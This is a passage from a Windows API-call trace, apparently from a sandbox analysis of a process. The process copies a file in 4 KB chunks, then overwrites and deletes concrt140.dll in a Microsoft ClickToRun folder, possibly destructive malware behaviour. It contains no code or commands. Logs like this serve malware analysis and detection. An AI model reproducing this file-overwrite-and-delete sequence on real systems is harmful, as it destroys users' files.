SetLastError (dwErrCode=0x0) [0095.467] GetLastError () returned 0x0 [0095.467] SetLastError (dwErrCode=0x0) [0095.467] GetLastError () returned 0x0 [0095.467] SetLastError (dwErrCode=0x0) [0095.467] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.467] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.468] GetLastError () returned 0x0 [0095.468] SetLastError (dwErrCode=0x0) [0095.468] GetLastError () returned 0x0 [0095.468] SetLastError (dwErrCode=0x0) [0095.468] GetLastError () returned 0x0 [0095.468] SetLastError (dwErrCode=0x0) [0095.468] GetLastError () returned 0x0 [0095.468] SetLastError (dwErrCode=0x0) [0095.468] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.468] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.468] GetLastError () returned 0x0 [0095.468] SetLastError (dwErrCode=0x0) [0095.469] GetLastError () returned 0x0 [0095.469] SetLastError (dwErrCode=0x0) [0095.469] GetLastError () returned 0x0 [0095.469] SetLastError (dwErrCode=0x0) [0095.469] GetLastError () returned 0x0 [0095.469] SetLastError (dwErrCode=0x0) [0095.469] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.469] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.469] GetLastError () returned 0x0 [0095.469] SetLastError (dwErrCode=0x0) [0095.469] GetLastError () returned 0x0 [0095.469] SetLastError (dwErrCode=0x0) [0095.470] GetLastError () returned 0x0 [0095.470] SetLastError (dwErrCode=0x0) [0095.470] GetLastError () returned 0x0 [0095.470] SetLastError (dwErrCode=0x0) [0095.470] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.470] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.470] GetLastError () returned 0x0 [0095.470] SetLastError (dwErrCode=0x0) [0095.470] GetLastError () returned 0x0 [0095.470] SetLastError (dwErrCode=0x0) [0095.470] GetLastError () returned 0x0 [0095.470] SetLastError (dwErrCode=0x0) [0095.470] GetLastError () returned 0x0 [0095.471] SetLastError (dwErrCode=0x0) [0095.471] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.471] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.471] GetLastError () returned 0x0 [0095.471] SetLastError (dwErrCode=0x0) [0095.471] GetLastError () returned 0x0 [0095.471] SetLastError (dwErrCode=0x0) [0095.471] GetLastError () returned 0x0 [0095.471] SetLastError (dwErrCode=0x0) [0095.471] GetLastError () returned 0x0 [0095.471] SetLastError (dwErrCode=0x0) [0095.471] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.472] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.472] GetLastError () returned 0x0 [0095.472] SetLastError (dwErrCode=0x0) [0095.472] GetLastError () returned 0x0 [0095.472] SetLastError (dwErrCode=0x0) [0095.472] GetLastError () returned 0x0 [0095.472] SetLastError (dwErrCode=0x0) [0095.472] GetLastError () returned 0x0 [0095.472] SetLastError (dwErrCode=0x0) [0095.472] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.472] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.473] GetLastError () returned 0x0 [0095.473] SetLastError (dwErrCode=0x0) [0095.473] GetLastError () returned 0x0 [0095.473] SetLastError (dwErrCode=0x0) [0095.473] GetLastError () returned 0x0 [0095.473] SetLastError (dwErrCode=0x0) [0095.473] GetLastError () returned 0x0 [0095.473] SetLastError (dwErrCode=0x0) [0095.473] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.473] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.474] GetLastError () returned 0x0 [0095.474] SetLastError (dwErrCode=0x0) [0095.474] GetLastError () returned 0x0 [0095.474] SetLastError (dwErrCode=0x0) [0095.474] GetLastError () returned 0x0 [0095.474] SetLastError (dwErrCode=0x0) [0095.474] GetLastError () returned 0x0 [0095.474] SetLastError (dwErrCode=0x0) [0095.474] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.474] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.474] GetLastError () returned 0x0 [0095.474] SetLastError (dwErrCode=0x0) [0095.475] GetLastError () returned 0x0 [0095.475] SetLastError (dwErrCode=0x0) [0095.475] GetLastError () returned 0x0 [0095.475] SetLastError (dwErrCode=0x0) [0095.475] GetLastError () returned 0x0 [0095.475] SetLastError (dwErrCode=0x0) [0095.475] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.475] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.475] GetLastError () returned 0x0 [0095.475] SetLastError (dwErrCode=0x0) [0095.475] GetLastError () returned 0x0 [0095.475] SetLastError (dwErrCode=0x0) [0095.476] GetLastError () returned 0x0 [0095.476] SetLastError (dwErrCode=0x0) [0095.476] GetLastError () returned 0x0 [0095.476] SetLastError (dwErrCode=0x0) [0095.476] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.476] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.476] GetLastError () returned 0x0 [0095.476] SetLastError (dwErrCode=0x0) [0095.476] GetLastError () returned 0x0 [0095.476] SetLastError (dwErrCode=0x0) [0095.476] GetLastError () returned 0x0 [0095.476] SetLastError (dwErrCode=0x0) [0095.477] GetLastError () returned 0x0 [0095.477] SetLastError (dwErrCode=0x0) [0095.477] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.477] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.477] GetLastError () returned 0x0 [0095.477] SetLastError (dwErrCode=0x0) [0095.477] GetLastError () returned 0x0 [0095.477] SetLastError (dwErrCode=0x0) [0095.477] GetLastError () returned 0x0 [0095.477] SetLastError (dwErrCode=0x0) [0095.477] GetLastError () returned 0x0 [0095.477] SetLastError (dwErrCode=0x0) [0095.478] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.478] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.478] GetLastError () returned 0x0 [0095.478] SetLastError (dwErrCode=0x0) [0095.478] GetLastError () returned 0x0 [0095.478] SetLastError (dwErrCode=0x0) [0095.478] GetLastError () returned 0x0 [0095.478] SetLastError (dwErrCode=0x0) [0095.479] GetLastError () returned 0x0 [0095.479] SetLastError (dwErrCode=0x0) [0095.479] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.479] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.480] GetLastError () returned 0x0 [0095.481] SetLastError (dwErrCode=0x0) [0095.481] GetLastError () returned 0x0 [0095.481] SetLastError (dwErrCode=0x0) [0095.481] GetLastError () returned 0x0 [0095.481] SetLastError (dwErrCode=0x0) [0095.481] GetLastError () returned 0x0 [0095.481] SetLastError (dwErrCode=0x0) [0095.481] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.481] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.481] GetLastError () returned 0x0 [0095.481] SetLastError (dwErrCode=0x0) [0095.482] GetLastError () returned 0x0 [0095.482] SetLastError (dwErrCode=0x0) [0095.482] GetLastError () returned 0x0 [0095.482] SetLastError (dwErrCode=0x0) [0095.482] GetLastError () returned 0x0 [0095.482] SetLastError (dwErrCode=0x0) [0095.482] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.482] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.482] GetLastError () returned 0x0 [0095.482] SetLastError (dwErrCode=0x0) [0095.482] GetLastError () returned 0x0 [0095.482] SetLastError (dwErrCode=0x0) [0095.482] GetLastError () returned 0x0 [0095.483] SetLastError (dwErrCode=0x0) [0095.483] GetLastError () returned 0x0 [0095.483] SetLastError (dwErrCode=0x0) [0095.483] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.483] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.483] GetLastError () returned 0x0 [0095.483] SetLastError (dwErrCode=0x0) [0095.483] GetLastError () returned 0x0 [0095.483] SetLastError (dwErrCode=0x0) [0095.483] GetLastError () returned 0x0 [0095.483] SetLastError (dwErrCode=0x0) [0095.484] GetLastError () returned 0x0 [0095.484] SetLastError (dwErrCode=0x0) [0095.484] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.484] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.484] GetLastError () returned 0x0 [0095.484] SetLastError (dwErrCode=0x0) [0095.484] GetLastError () returned 0x0 [0095.484] SetLastError (dwErrCode=0x0) [0095.484] GetLastError () returned 0x0 [0095.484] SetLastError (dwErrCode=0x0) [0095.484] GetLastError () returned 0x0 [0095.484] SetLastError (dwErrCode=0x0) [0095.485] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.485] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.485] GetLastError () returned 0x0 [0095.485] SetLastError (dwErrCode=0x0) [0095.485] GetLastError () returned 0x0 [0095.485] SetLastError (dwErrCode=0x0) [0095.485] GetLastError () returned 0x0 [0095.485] SetLastError (dwErrCode=0x0) [0095.485] GetLastError () returned 0x0 [0095.485] SetLastError (dwErrCode=0x0) [0095.485] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.486] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.486] GetLastError () returned 0x0 [0095.486] SetLastError (dwErrCode=0x0) [0095.486] GetLastError () returned 0x0 [0095.486] SetLastError (dwErrCode=0x0) [0095.486] GetLastError () returned 0x0 [0095.486] SetLastError (dwErrCode=0x0) [0095.486] GetLastError () returned 0x0 [0095.486] SetLastError (dwErrCode=0x0) [0095.486] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.486] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.486] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.487] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.487] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] GetLastError () returned 0x0 [0095.487] SetLastError (dwErrCode=0x0) [0095.487] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.487] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.488] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] GetLastError () returned 0x0 [0095.488] SetLastError (dwErrCode=0x0) [0095.488] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.489] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.489] GetLastError () returned 0x0 [0095.489] SetLastError (dwErrCode=0x0) [0095.489] GetLastError () returned 0x0 [0095.489] SetLastError (dwErrCode=0x0) [0095.489] GetLastError () returned 0x0 [0095.489] SetLastError (dwErrCode=0x0) [0095.489] GetLastError () returned 0x0 [0095.489] SetLastError (dwErrCode=0x0) [0095.489] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.489] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.489] GetLastError () returned 0x0 [0095.489] SetLastError (dwErrCode=0x0) [0095.489] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.490] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.490] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.490] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.490] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.490] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.490] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x4a8, lpOverlapped=0x0) returned 1 [0095.490] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.491] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0095.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0095.491] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0x4b0, lpOverlapped=0x0) returned 1 [0095.491] CloseHandle (hObject=0x418) returned 1 [0095.491] CloseHandle (hObject=0x33c) returned 1 [0095.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.496] GetFileType (hFile=0x33c) returned 0x1 [0095.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0095.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0095.496] GetLastError () returned 0xb7 [0095.496] SetLastError (dwErrCode=0xb7) [0095.497] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0095.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0095.497] CloseHandle (hObject=0x33c) returned 1 [0095.498] AreFileApisANSI () returned 1 [0095.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0095.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0095.498] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll")) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0095.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 